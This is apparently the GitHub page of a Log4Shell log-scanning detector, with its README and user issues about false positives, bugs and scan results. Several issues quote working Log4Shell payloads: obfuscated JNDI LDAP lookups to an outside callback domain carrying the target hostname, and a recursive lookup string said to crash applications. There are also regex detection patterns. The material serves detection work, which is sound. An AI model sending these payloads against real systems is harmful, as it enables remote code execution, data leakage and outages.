Detector for Log4Shell exploitation attempts

Overview

log4shell-detector

Detector for Log4Shell exploitation attempts

Idea

The problem with the log4j CVE-2021-44228 exploitation is that the string can be heavily obfuscated in many different ways. It is impossible to cover all possible forms with a reasonable regular expression.

The idea behind this detector is that the respective characters have to appear in a log line in a certain order to match.

${jndi:ldap:

Split up into a list it would look like this:

['$', '{', 'j', 'n', 'd', 'i', ':', 'l', 'd', 'a', 'p', ':']

I call these lists 'detection pads' in my script and process each log line character by character. I check if each character matches the first element of the detection pads. If the character matches a character in one of the detection pads, a pointer moves forward.

When the pointer reaches the end of the list, the detection triggered and the script prints the file name, the complete log line, the detected string and the number of the line in the file.

I've included a decoder for URL based encodings. If we need more, please let me know.

Usage

usage: log4shell-detector.py [-h] [-p path [path ...]] [-d maxdis] [--quick] [--defaultpaths] [--debug]

Log4Shell Exploitation Detectors

optional arguments:
  -h, --help          show this help message and exit
  -p path [path ...]  Path to scan
  -d distance         Maximum distance between each character
  --quick             Skip log lines that don't contain a 2021 or 2022 time stamp
  --defaultpaths      Scan a set of default paths that should contain relevant log files.
  --debug             Debug output

Special Flags

--quick

Only checks log lines that contain a 2021 or 2022 to exclude all scanning of older log entries. We assume that the vulnerability wasn't exploited in 2019 and earlier.

--defaultpaths

Check a list of default log paths used by different software products.

Requirements

  • Python3

No further or special Python modules are required. It should run on any system that runs Python3.

Screenshots

Screen1

Screen2

Help

There are different ways how you can help.

A. Test it against the payloads that you find in-the-wild and let me know if we miss something B. Help me find and fix bugs C. Test if the scripts runs with Python 2; if not, we can add a slightly modified version to the repo

Contact

Twitter: @cyberops

Comments
  • Refactor detector into a module and add Base64 Decoding

    Refactor detector into a module and add Base64 Decoding

    • Refactor the detector into a module so that it can be called from other places (ie threat hunting notebooks)
    • Add a sample for Base64 obfuscation
    • Handle Base64 obfuscation in a more robust way vs looking only for a full string
    opened by JasonKeirstead 9
  • Need assistance with script

    Need assistance with script

    I submitted an issue previously but it was closed without a resolution. Below is the log file. At the end of the script it says it found one exploit attempt, but there were none listed in the actual script per the screenshots of the script on the main page. Simply a deobfuscated string which I'm well aware of that data is in plain text, and isn't an exploit attempt. So unsure why it's stating exploit attempt. Any clarification would be appreciated.

    < [.] Starting scan DATE: 2021-12-13 11:37:03.460995 [.] Scanning FOLDER: /var/log ... [.] Processing /var/log/syslog.3.gz ... [.] Processing /var/log/syslog.7.gz ... [.] Processing /var/log/debug.1 ... [.] Processing /var/log/fontconfig.log ... [.] Processing /var/log/syslog.2.gz ... [.] Processing /var/log/user.log.3.gz ... [.] Processing /var/log/syslog.1 ... [.] Processing /var/log/debug.4.gz ... [.] Processing /var/log/dpkg.log.2.gz ... [.] Processing /var/log/alternatives.log.2.gz ... [.] Processing /var/log/auth.log.2.gz ... [.] Processing /var/log/debug.3.gz ... [.] Processing /var/log/daemon.log.3.gz ... [.] Processing /var/log/debug ... [.] Processing /var/log/btmp ... [.] Processing /var/log/daemon.log.4.gz ... [.] Processing /var/log/lastlog ... [.] Processing /var/log/daemon.log.2.gz ... [.] Processing /var/log/auth.log.1 ... [.] Processing /var/log/dpkg.log.4.gz ... [.] Processing /var/log/user.log.1 ... [.] Processing /var/log/vncserver-x11.log ... [.] Processing /var/log/user.log ... [.] Processing /var/log/wtmp ... [.] Processing /var/log/auth.log.4.gz ... [.] Processing /var/log/user.log.2.gz ... [.] Processing /var/log/alternatives.log.3.gz ... [.] Processing /var/log/Xorg.0.log ... [.] Processing /var/log/bootstrap.log ... [.] Processing /var/log/kern.log.1 ... [.] Processing /var/log/Xorg.0.log.old ... [.] Processing /var/log/kern.log.4.gz ... [.] Processing /var/log/dpkg.log ... [.] Processing /var/log/messages.3.gz ... [.] Processing /var/log/auth.log.3.gz ... [.] Processing /var/log/syslog ... [.] Processing /var/log/messages.4.gz ... [.] Processing /var/log/dpkg.log.1 ... [.] Processing /var/log/messages ... [.] Processing /var/log/daemon.log.1 ... [.] Processing /var/log/syslog.4.gz ... [.] Processing /var/log/alternatives.log ... [.] Processing /var/log/kern.log.3.gz ... [.] Processing /var/log/btmp.1 ... [.] Processing /var/log/syslog.5.gz ... [.] Processing /var/log/messages.1 ... [.] Processing /var/log/dpkg.log.3.gz ... [.] Processing /var/log/daemon.log ... [.] Processing /var/log/debug.2.gz ... [.] Processing /var/log/auth.log ... [.] Processing /var/log/messages.2.gz ... [.] Processing /var/log/alternatives.log.4.gz ... [.] Processing /var/log/faillog ... [.] Processing /var/log/user.log.4.gz ... [.] Processing /var/log/syslog.6.gz ... [.] Processing /var/log/boot.log ... [.] Processing /var/log/kern.log.2.gz ... [.] Processing /var/log/kern.log ... [.] Processing /var/log/alternatives.log.1 ... [.] Processing /var/log/vncserver-x11.log.bak ... [.] Processing /var/log/lightdm/x-0.log ... [.] Processing /var/log/lightdm/lightdm.log.old ... [.] Processing /var/log/lightdm/lightdm.log ... [.] Processing /var/log/lightdm/seat0-greeter.log ... [.] Processing /var/log/lightdm/x-0.log.old ... [.] Processing /var/log/lightdm/seat0-greeter.log.old ... [.] Processing /var/log/cups/error_log.2.gz ... [.] Processing /var/log/cups/access_log.1 ... [.] Processing /var/log/cups/error_log.4.gz ... [.] Processing /var/log/cups/access_log.7.gz ... [.] Processing /var/log/cups/error_log.5.gz ... [.] Processing /var/log/cups/access_log ... [.] Processing /var/log/cups/access_log.4.gz ... [.] Processing /var/log/cups/error_log.3.gz ... [.] Processing /var/log/cups/access_log.6.gz ... [.] Processing /var/log/cups/error_log.6.gz ... [.] Processing /var/log/cups/error_log.7.gz ... [.] Processing /var/log/cups/access_log.2.gz ... [.] Processing /var/log/cups/access_log.5.gz ... [.] Processing /var/log/cups/error_log ... [.] Processing /var/log/cups/error_log.1 ... [.] Processing /var/log/cups/access_log.3.gz ... [.] Processing /var/log/samba/log.smbd.1 ... [.] Processing /var/log/samba/log.smbd ... [.] Processing /var/log/samba/log.%m ... [.] Processing /var/log/samba/log.nmbd ... [.] Processing /var/log/samba/log. ... [.] Processing /var/log/samba/log.192.168.15.7 ... [.] Processing /var/log/samba/log.desktop-q4t69gh ... [.] Processing /var/log/samba/log.nmbd.1 ... [.] Processing /var/log/apt/term.log.1.gz ... [.] Processing /var/log/apt/term.log.4.gz ... [.] Processing /var/log/apt/history.log.4.gz ... [.] Processing /var/log/apt/history.log.1.gz ... [.] Processing /var/log/apt/history.log ... [.] Processing /var/log/apt/term.log.2.gz ... [.] Processing /var/log/apt/term.log ... [.] Processing /var/log/apt/history.log.2.gz ... [.] Processing /var/log/apt/history.log.3.gz ... [.] Processing /var/log/apt/term.log.3.gz ... [.] Processing /var/log/apt/eipp.log.xz ... [!] FILE: /var/log/auth.log LINE_NUMBER: 124 DEOBFUSCATED_STRING: ${jndi:nds:/ LINE: Dec 13 10:56:12 raspberrypi sudo: pi : TTY=pts/0 ; PWD=/home/pi ; USER=root ; COMMAND=/usr/bin/egrep -I -i -r $({|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+ /var/log [!] 1 files with exploitation attempts detected in PATH: /var/log [!!!] 1 exploitation attempts detected in the complete scan [.] Finished scan DATE: 2021-12-13 12:01:46.740776 [.] Scan took the following time to complete DURATION: 0 hours 24 minutes 43 seconds

    opened by Viceman256 7
  • Exploit attempt?

    Exploit attempt?

    I have ran this script on my pi. Per your screenshot you can see a line stating an exploit attempt. Mine says at the end that there is an exploit attempt, but doesn't tell me which log. I also get an error on one of the files, could be triggering that alert.

    [.] Starting scan DATE: 2021-12-13 11:37:03.460995 [.] Scanning FOLDER: /var/log ... [.] Processing /var/log/syslog.3.gz ... [.] Processing /var/log/syslog.7.gz ... [.] Processing /var/log/debug.1 ... [.] Processing /var/log/fontconfig.log ... [.] Processing /var/log/syslog.2.gz ... [.] Processing /var/log/user.log.3.gz ... [.] Processing /var/log/syslog.1 ... [.] Processing /var/log/debug.4.gz ... [.] Processing /var/log/dpkg.log.2.gz ... [.] Processing /var/log/alternatives.log.2.gz ... [.] Processing /var/log/auth.log.2.gz ... [.] Processing /var/log/debug.3.gz ... [.] Processing /var/log/daemon.log.3.gz ... [.] Processing /var/log/debug ... [.] Processing /var/log/btmp ... [.] Processing /var/log/daemon.log.4.gz ... [.] Processing /var/log/lastlog ... [.] Processing /var/log/daemon.log.2.gz ... [.] Processing /var/log/auth.log.1 ... [.] Processing /var/log/dpkg.log.4.gz ... [.] Processing /var/log/user.log.1 ... [.] Processing /var/log/vncserver-x11.log ... [.] Processing /var/log/user.log ... [.] Processing /var/log/wtmp ... [.] Processing /var/log/auth.log.4.gz ... [.] Processing /var/log/user.log.2.gz ... [.] Processing /var/log/alternatives.log.3.gz ... [.] Processing /var/log/Xorg.0.log ... [.] Processing /var/log/bootstrap.log ... [.] Processing /var/log/kern.log.1 ... [.] Processing /var/log/Xorg.0.log.old ... [.] Processing /var/log/kern.log.4.gz ... [.] Processing /var/log/dpkg.log ... [.] Processing /var/log/messages.3.gz ... [.] Processing /var/log/auth.log.3.gz ... [.] Processing /var/log/syslog ... [.] Processing /var/log/messages.4.gz ... [.] Processing /var/log/dpkg.log.1 ... [.] Processing /var/log/messages ... [.] Processing /var/log/daemon.log.1 ... [.] Processing /var/log/syslog.4.gz ... [.] Processing /var/log/alternatives.log ... [.] Processing /var/log/kern.log.3.gz ... [.] Processing /var/log/btmp.1 ... [.] Processing /var/log/syslog.5.gz ... [.] Processing /var/log/messages.1 ... [.] Processing /var/log/dpkg.log.3.gz ... [.] Processing /var/log/daemon.log ... [.] Processing /var/log/debug.2.gz ... [.] Processing /var/log/auth.log ... [.] Processing /var/log/messages.2.gz ... [.] Processing /var/log/alternatives.log.4.gz ... [.] Processing /var/log/faillog ... [.] Processing /var/log/user.log.4.gz ... [.] Processing /var/log/syslog.6.gz ... [.] Processing /var/log/boot.log ... [.] Processing /var/log/kern.log.2.gz ... [.] Processing /var/log/kern.log ... [.] Processing /var/log/alternatives.log.1 ... [.] Processing /var/log/vncserver-x11.log.bak ... [.] Processing /var/log/lightdm/x-0.log ... [.] Processing /var/log/lightdm/lightdm.log.old ... [.] Processing /var/log/lightdm/lightdm.log ... [.] Processing /var/log/lightdm/seat0-greeter.log ... [.] Processing /var/log/lightdm/x-0.log.old ... [.] Processing /var/log/lightdm/seat0-greeter.log.old ... [.] Processing /var/log/cups/error_log.2.gz ... [.] Processing /var/log/cups/access_log.1 ... [.] Processing /var/log/cups/error_log.4.gz ... [.] Processing /var/log/cups/access_log.7.gz ... [.] Processing /var/log/cups/error_log.5.gz ... [.] Processing /var/log/cups/access_log ... [.] Processing /var/log/cups/access_log.4.gz ... [.] Processing /var/log/cups/error_log.3.gz ... [.] Processing /var/log/cups/access_log.6.gz ... [.] Processing /var/log/cups/error_log.6.gz ... [.] Processing /var/log/cups/error_log.7.gz ... [.] Processing /var/log/cups/access_log.2.gz ... [.] Processing /var/log/cups/access_log.5.gz ... [.] Processing /var/log/cups/error_log ... [.] Processing /var/log/cups/error_log.1 ... [.] Processing /var/log/cups/access_log.3.gz ... [.] Processing /var/log/samba/log.smbd.1 ... [.] Processing /var/log/samba/log.smbd ... [.] Processing /var/log/samba/log.%m ... [.] Processing /var/log/samba/log.nmbd ... [.] Processing /var/log/samba/log. ... [.] Processing /var/log/samba/log.192.168.15.7 ... [.] Processing /var/log/samba/log.desktop-q4t69gh ... [.] Processing /var/log/samba/log.nmbd.1 ... [.] Processing /var/log/apt/term.log.1.gz ... [.] Processing /var/log/apt/term.log.4.gz ... [.] Processing /var/log/apt/history.log.4.gz ... [.] Processing /var/log/apt/history.log.1.gz ... [.] Processing /var/log/apt/history.log ... [.] Processing /var/log/apt/term.log.2.gz ... [.] Processing /var/log/apt/term.log ... [.] Processing /var/log/apt/history.log.2.gz ... [.] Processing /var/log/apt/history.log.3.gz ... [.] Processing /var/log/apt/term.log.3.gz ... [.] Processing /var/log/apt/eipp.log.xz ... [!] FILE: /var/log/auth.log LINE_NUMBER: 124 DEOBFUSCATED_STRING: ${jndi:nds:/ LINE: Dec 13 10:56:12 raspberrypi sudo: pi : TTY=pts/0 ; PWD=/home/pi ; USER=root ; COMMAND=/usr/bin/egrep -I -i -r $({|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+ /var/log [!] 1 files with exploitation attempts detected in PATH: /var/log [!!!] 1 exploitation attempts detected in the complete scan [.] Finished scan DATE: 2021-12-13 12:01:46.740776 [.] Scan took the following time to complete DURATION: 0 hours 24 minutes 43 seconds

    opened by Viceman256 4
  • defaultdict for matches, format output, summary option, simpler Python2 compatibility

    defaultdict for matches, format output, summary option, simpler Python2 compatibility

    • Changed matches to be in a defaultdict with files and line numbers as keys
    • Added a summary option that only prints files and line numbers
    • Simplified Python2 compatibility check, removes need for sys
      • Verified works on Python 2.7.16
    • Formatted output to be leveled file --> line number --> match
    • Simplified argparse requirement for an input
    opened by stephanGarland 4
  • "Exploitation attempt detected", but pattern not in DETECTION_STRINGS. False positive?

    log4shell-detector.py detects am exploitation attempt via patttern ${jndi:ldap: in a log file but the pattern is not in the log:

    [!!!] Exploitation attempt detected FILE: /var/log/firstboot/vpxd-svcs_firstboot.py_24133_stdout.log LINE_NUMBER: 22 LINE: 2021-03-12T00:12:10.861Z ['# invsvc cisreg props\n', 'solutionUser.name = ${solution-user.name}\n', 'solutionUser.ownerId = ${solution-user.name}@${vmdir.domain-name}\n', 'cmreg.serviceid = ${invsvc.service-id}\n', '# invsvc registration spec properties\n', 'serviceVersion = 1.0\n', 'ownerId = ${solution-user.name}@${vmdir.domain-name}\n', 'serviceType.product = com.vmware.cis\n', 'serviceType.type = cs.inventory\n', 'serviceNameResourceKey = cs.inventory.ServiceName\n', 'serviceDescriptionResourceKey = cs.inventory.ServiceDescription\n', 'serviceGroupResourceKey = cs.inventory.servicegroupresource\n', 'serviceGroupInternalId = cs\n', 'controlScriptPath = ${controlscript.path}\n', 'hostId = ${sca.hostid}\n', 'endpoint0.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}/invsvc\n', 'endpoint0.type.protocol = http\n', 'endpoint0.type.id = com.vmware.cis.inventory\n', 'endpoint1.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}/invsvc/vmomi/sdk\n', 'endpoint1.type.protocol = vmomi\n', 'endpoint1.type.id = com.vmware.cis.inventory.server\n', 'endpoint2.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}/invsvc/vmomi/sdk\n', 'endpoint2.type.protocol = vmomi\n', 'endpoint2.type.id = com.vmware.cis.tagging.server\n', 'endpoint3.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}/invsvc/vapi\n', 'endpoint3.type.protocol = vapi.json.https\n', 'endpoint3.type.id = com.vmware.cis.inventory.vapi\n', 'endpoint3.data0.key = com.vmware.vapi.metadata.metamodel.file.authz\n', 'endpoint3.data0.value = /usr/lib/vmware-vpxd-svcs/vapi-metadata/authz/authz_metamodel.json\n', 'endpoint3.data1.key = com.vmware.vapi.metadata.authentication.file.authz\n', 'endpoint3.data1.value = /usr/lib/vmware-vpxd-svcs/vapi-metadata/authz/authz_authentication.json\n', 'endpoint3.data2.key = com.vmware.vapi.metadata.routing.file.authz\n', 'endpoint3.data2.value = /usr/lib/vmware-vpxd-svcs/vapi-metadata/authz/authz_routing.json\n', 'endpoint3.data3.key = com.vmware.vapi.metadata.metamodel.file.tagging\n', 'endpoint3.data3.value = /usr/lib/vmware-vpxd-svcs/vapi-metadata/tagging/com.vmware.cis.tagging_metamodel.json\n', 'endpoint3.data4.key = com.vmware.vapi.metadata.authentication.file.tagging\n', 'endpoint3.data4.value = /usr/lib/vmware-vpxd-svcs/vapi-metadata/tagging/com.vmware.cis.tagging_authentication.json\n', 'endpoint3.data5.key = com.vmware.vapi.metadata.cli.file.tagging\n', 'endpoint3.data5.value = /usr/lib/vmware-vpxd-svcs/vapi-metadata/tagging/com.vmware.cis.tagging_cli.json\n', 'endpoint4.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}\n', 'endpoint4.type.protocol = gRPC\n', 'endpoint4.type.id = tagging\n', 'endpoint4.data0.key = cis.common.ep.localurl\n', 'endpoint4.data0.value = http://localhost:##{TAGGING_GRPC_PORT}##\n', 'attribute0.key = Syncable\n', 'attribute0.value = ELM,SPOG\n', 'attribute1.key = Subscribable\n', 'attribute1.value = true\n', 'health.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}/invsvc/invsvc-health\n', 'resourcebundle.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}/invsvc/invsvc-resource\n', 'resourcebundle.data0.key = com.vmware.cis.common.resourcebundle.basename\n', 'resourcebundle.data0.value = cs.inventory.ResourceBundle\n', '# reverse proxy configuration\n', 'rhttpproxy.file = invsvc-proxy.conf\n', 'rhttpproxy.endpoint0.namespace = /invsvc\n', 'rhttpproxy.endpoint0.connectionType = local\n', 'rhttpproxy.endpoint0.address = ${vpxd-svcs.int.http}\n', 'rhttpproxy.endpoint0.httpAccessMode = redirect\n', 'rhttpproxy.endpoint0.httpsAccessMode = allow\n'] DEOBFUSCATED_STRING: ${jndi:ldap:

    opened by busch 3
  • gzipped log-file path validation

    gzipped log-file path validation

    The gzipped file path validation assumes that there is "log." string in path-name. This causes problems if log-file naming format is something like "SystemOut.log-20211212.gz". Could the dot (.) be removed from validation condition?

    opened by aylatalo 2
  • invalid character in cmd [Version 10.0.14393] on Windows Server 2016

    invalid character in cmd [Version 10.0.14393] on Windows Server 2016

    C:\Users\Administrator\Downloads>python log4shell-detector.py -p C:\windows File "C:\Users\Administrator\Downloads\log4shell-detector.py", line 106 log4shell-detector/log4shell-detector.py at main · Neo23x0/log4shell-detector · GitHub ^ SyntaxError: invalid character '·' (U+00B7)

    opened by atleast1eyeblnd 2
  • New payloads

    New payloads

    These payloads do not appear with a google or github search so I think they are new. Cloudflare WAF has pretty good detection rules for this, but their WAF did not block these.

    Please close this issue or do what you like with this information, I just wanted to share these somewhere where they may have some impact. I did not test them with this repo.

    IP: 89.248.173.140

    path query: /%3Fx=$%7Bjndi:ldap:/guidedhacking.com.c6tsifp2pij91e3kaft0cg7h1xayyyyyn.explorelocalpaths.com/a%7D

    user agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://{{Hostname}}.c6tsifp2pij91e3kaft0cg7h1xayyyyyn.explorelocalpaths.com}

    it appears their expansion of {{Hostname}} did not work as intended in the useragent

    opened by GH-Rake 1
  • MemoryError - [E] Can't process FILE: xxxx REASON: None

    MemoryError - [E] Can't process FILE: xxxx REASON: None

    scan_file result = self.check_line(line) File "xxxx/log4shell-detector-main/Log4ShellDetector/Log4ShellDetector.py", line 82, in check_line linechars = list(decoded_line) MemoryError [E] Can't process FILE: xxxx REASON: None

    This can be an issue, especially with --auto detection, unusual txt files and and memory limited environments.

    There is unnecessary list conversion in Log4ShellDetector. In this case no need to convert string to list in order to iterate the characters in the string. If list conversion is skipped, memory usage should decrease.

    "for c in linechars:" is same as "for c in decoded_line:"

    opened by boog1ebug 1
  • http statuscode to exploit attempts

    http statuscode to exploit attempts

    Hello,

    thanks for this tool. How would you detect if an exploit has been successful via the http codes? Would 404 code mean the request has been blocked and any 2xx code that it was successful?

    Thanks in advance.

    opened by 4jwWa2EnYK5FIIaK7AVp 1
  • Add references/steps to follow for removing the exploit.

    Add references/steps to follow for removing the exploit.

    I ran the script on my server and got the below results. However, neither Java nor log4j is installed on my server. Please guide me on what to do next. sudo python3 log4shell-detector.py -p /var/log/ --summary

    [.] Starting scan DATE: 2021-12-14 05:34:03.155342 [.] Scanning FOLDER: /var/log/ ...

    [!] 10 files with exploitation attempts detected in PATH: /var/log/ [!] FILE: /var/log/gitlab/gitlab-workhorse/current LINE_NUMBER: 255 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.3.gz LINE_NUMBER: 1489 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.3.gz LINE_NUMBER: 2204 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.3.gz LINE_NUMBER: 2205 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.3.gz LINE_NUMBER: 2444 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.3.gz LINE_NUMBER: 2445 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 1 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 2 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 3 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 136 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 157 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 158 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 159 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 372 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 373 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 374 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 375 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 376 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 581 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 582 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 583 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 584 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 1227 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 25 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 52 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 63 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 64 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 165 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 1332 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 1537 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 1580 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/gitlab-rails/production.log.2.gz LINE_NUMBER: 2043 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production.log.2.gz LINE_NUMBER: 2045 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.1.gz LINE_NUMBER: 504 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.1.gz LINE_NUMBER: 505 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.1.gz LINE_NUMBER: 5507 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.3.gz LINE_NUMBER: 6339 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.3.gz LINE_NUMBER: 6340 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.3.gz LINE_NUMBER: 6932 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production.log.1.gz LINE_NUMBER: 1878 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/gitlab-rails/production.log.1.gz LINE_NUMBER: 1880 STRING: ${jndi:dns:/ [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 5 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 6 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 474 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 1422 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 1423 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 2527 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 2528 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production.log.3.gz LINE_NUMBER: 30592 STRING: ${jndi:ldap: [!] FILE: /var/log/gitlab/gitlab-rails/production.log.3.gz LINE_NUMBER: 30594 STRING: ${jndi:ldap: [!!!] 50 exploitation attempts detected in the complete scan [.] Finished scan DATE: 2021-12-14 05:50:44.095624 [.] Scan took the following time to complete DURATION: 0 hours 16 minutes 40 seconds

    opened by harishch4 1
  • Modified script for including more payloads

    Modified script for including more payloads

    Thanks for the wonderful code for detecting the payloads! I tested this script against variety of known payloads available and found it is failing to detect some payloads containing invalid unicode character, you can find the example here https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words So I created another function to decode these invalid unicodes to ASCII using a package called "anyascii"(so one need to install this package using pip, hoping it is not an inconvenience), decoded these strings and added a conditional statements for dealing with non-ASCII charecters.

    Also I added the encoded example of these invalid unicodes in the testing script with a heading invalid unicodes in the plain positive text category. I tested my script and I found some false positive cases so as you can notice I modified these detection strings with an extra "/" , so that it can bypass the false positive cases.

    Please review my code and kindly let me know any questions and suggestions you have! Thank you!

    opened by vidhyasasi 0
  • New payload results in DOS attack

    New payload results in DOS attack

    Thank you for the brilliant code for scanning the payload! I have an issues as follows : Payload Description: If a string substitution is attempted for any reason on the following string, it will trigger an infinite recursion, and the application will crash: ${${::-${::-$${::-j}}}}. Reference : https://issues.apache.org/jira/browse/LOG4J2-3230

    I tried the script to test whether it could bypass the mentioned payload and unfortunately it could not.So is it possible to modify the script to include this payload as well? Thanks !

    opened by vidhyasasi 0
  • Not working in version 0.11.1 / No module named 'Log4ShellDetector'

    Not working in version 0.11.1 / No module named 'Log4ShellDetector'

    MyUser@MyHost:scripts>python3 Log4ShellDetector --auto Traceback (most recent call last):

    File "/home/MyUser/scripts/Log4ShellDetector", line 16, in import Log4ShellDetector.Log4ShellDetector as Log4ShellDetector ModuleNotFoundError: No module named 'Log4ShellDetector'

    opened by MaFreiberger 1
  • find command reports [wj]ar as listing log4j, but manual inspection diverges

    find command reports [wj]ar as listing log4j, but manual inspection diverges

    Hi there,

    many thanks again for all the hard work!

    The following command returns several matches for a Java program on a machine we have:

    find . -name '*[wj]ar' -print -exec sh -c 'jar tvf {} | grep log4j' \;
    

    But, a manual inspection of those matched files shows empty grep results. For example, the following file matches:

    ./lib/xml.jar
    

    If I run jar tvf on that, then I get the output in the attached file:

    https://www.dropbox.com/s/snzdgxzlx9fhucy/lib_xml_jar_tvf.txt?dl=0

    Running this through grep log4j returns an empty result:

    me@host:/opt/IBM/SPSS/Concurrent_Licensing_Tools/sentinellm/JRE$ jar tvf ./lib/xml.jar | grep log4j
    
    me@host:/opt/IBM/SPSS/Concurrent_Licensing_Tools/sentinellm/JRE$
    

    I am not a pro with the find command, so not sure how to adjust it.

    Best wishes and many thanks, Rob

    opened by rennis250 0
  • False alarms?

    False alarms?

    First off, many thanks for this great tool in this terrible situation!

    Sorry if this is the wrong place to raise this, but it seems we might be getting false alarms on our system. I have run the detector a few times on /var/log and every time, it reports three lines as attempts in a cdebconf file, but the deobfuscated string is different each time.

    Here are three examples:

    [!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 65224 DEOBFUSCATED_STRING: ${jndi:dns: LINE: Extended_description-ku.UTF-8: Cîhaza ku hatiye hilbijartin partîsiyonên ji bo cîhazên RAiD dihundirîne. Ew cîhaz û partîsiyon dê werin rakirin:\n\nCîhaza Software RAID li bêr rakirinê ye: ${REMOVED_DEVICES}\n\nPartition ji hêla van cîhazên RAID ve hat bikaranîn: ${REMOVED_PARTITIONS}\n\nNîşe: Her wisa evê her tim hemû daneyên li ser cîhazên RAID yên nivîsbarî jê bibe.
    [!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 58996 DEOBFUSCATED_STRING: ${jndi:nis: LINE: Extended_description-sl.UTF-8: Povzetek trenutne nastavitve LVM:\n\n Prosti fizični nosilci:  ${FREE_PVS}\n Uporabljeni fizični nosilci:  ${USED_PVS}\n Skupine nosilcev:          ${VGS}\n Logični nosilci:        ${LVS}
